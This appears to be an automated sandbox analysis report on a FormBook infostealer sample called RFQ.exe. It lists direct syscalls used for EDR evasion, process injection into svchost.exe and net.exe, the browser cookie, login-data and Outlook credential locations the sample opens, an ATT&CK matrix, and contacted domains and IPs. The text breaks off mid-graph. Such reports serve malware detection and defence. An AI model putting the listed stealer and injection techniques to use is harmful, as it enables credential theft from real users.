                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C8F9 mov eax, dword ptr fs:[00000030h]7_2_0366C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365E8C0 mov eax, dword ptr fs:[00000030h]7_2_0365E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630887 mov eax, dword ptr fs:[00000030h]7_2_03630887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BC89D mov eax, dword ptr fs:[00000030h]7_2_036BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365AF69 mov eax, dword ptr fs:[00000030h]7_2_0365AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365AF69 mov eax, dword ptr fs:[00000030h]7_2_0365AF69
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2F60 mov eax, dword ptr fs:[00000030h]7_2_036D2F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2F60 mov eax, dword ptr fs:[00000030h]7_2_036D2F60
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_004238DA
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041F250 SetUnhandledExceptionFilter,1_2_0041F250
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041A208
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00417DAA

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtOpenKeyEx: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtQueryValueKey: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 7812Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread APC queued: target process: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\RFQ.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: B64008Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00436CD7 LogonUserW,1_2_00436CD7
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,1_2_0040D590
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00434418
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,1_2_0043333C
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\QrvPXARBoEbtUsiaUykbcLKuPmcBzNKBOrZTpVsKIThgQdPcYEPVmeHBZztkAdHanzPhQdtNVWJ\rNgGAKxrFRkFYx.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,1_2_00446124
                Source: RFQ.exe, rNgGAKxrFRkFYx.exe, 00000009.00000002.3128003486.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000000.1356700531.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1575922606.0000000000E10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: rNgGAKxrFRkFYx.exe, 00000009.00000002.3128003486.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000000.1356700531.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1575922606.0000000000E10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: rNgGAKxrFRkFYx.exe, 00000009.00000002.3128003486.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000000.1356700531.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1575922606.0000000000E10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: rNgGAKxrFRkFYx.exe, 00000009.00000002.3128003486.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 00000009.00000000.1356700531.00000000016B0000.00000002.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000000.1575922606.0000000000E10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: RFQ.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,1_2_004720DB
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00472C3F GetUserNameW,1_2_00472C3F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,1_2_0041E364
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,1_2_0040E500

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: RFQ.exeBinary or memory string: WIN_XP
                Source: RFQ.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
                Source: RFQ.exeBinary or memory string: WIN_XPe
                Source: RFQ.exeBinary or memory string: WIN_VISTA
                Source: RFQ.exeBinary or memory string: WIN_7
                Source: RFQ.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3128924724.00000000034F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1512156269.0000000009040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3131106553.0000000004C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1506663824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3129083519.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.1507308924.00000000061A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3121215291.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3129016508.0000000005600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,1_2_004652BE
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,1_2_00476619
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 1_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,1_2_0046CEF3

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		2
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS16
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets141
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551421 Sample: RFQ.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 100 28 www.wukong.college 2->28 30 www.vnxoso88.art 2->30 32 14 other IPs or domains 2->32 42 Antivirus detection for URL or domain 2->42 44 Yara detected FormBook 2->44 46 Machine Learning detection for sample 2->46 48 2 other signatures 2->48 10 RFQ.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 rNgGAKxrFRkFYx.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 net.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 rNgGAKxrFRkFYx.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.pluribiz.life 209.74.64.58, 49854, 49855, 49856 MULTIBAND-NEWHOPEUS United States 22->34 36 www.evoo.website 128.65.195.180, 49862, 49863, 49864 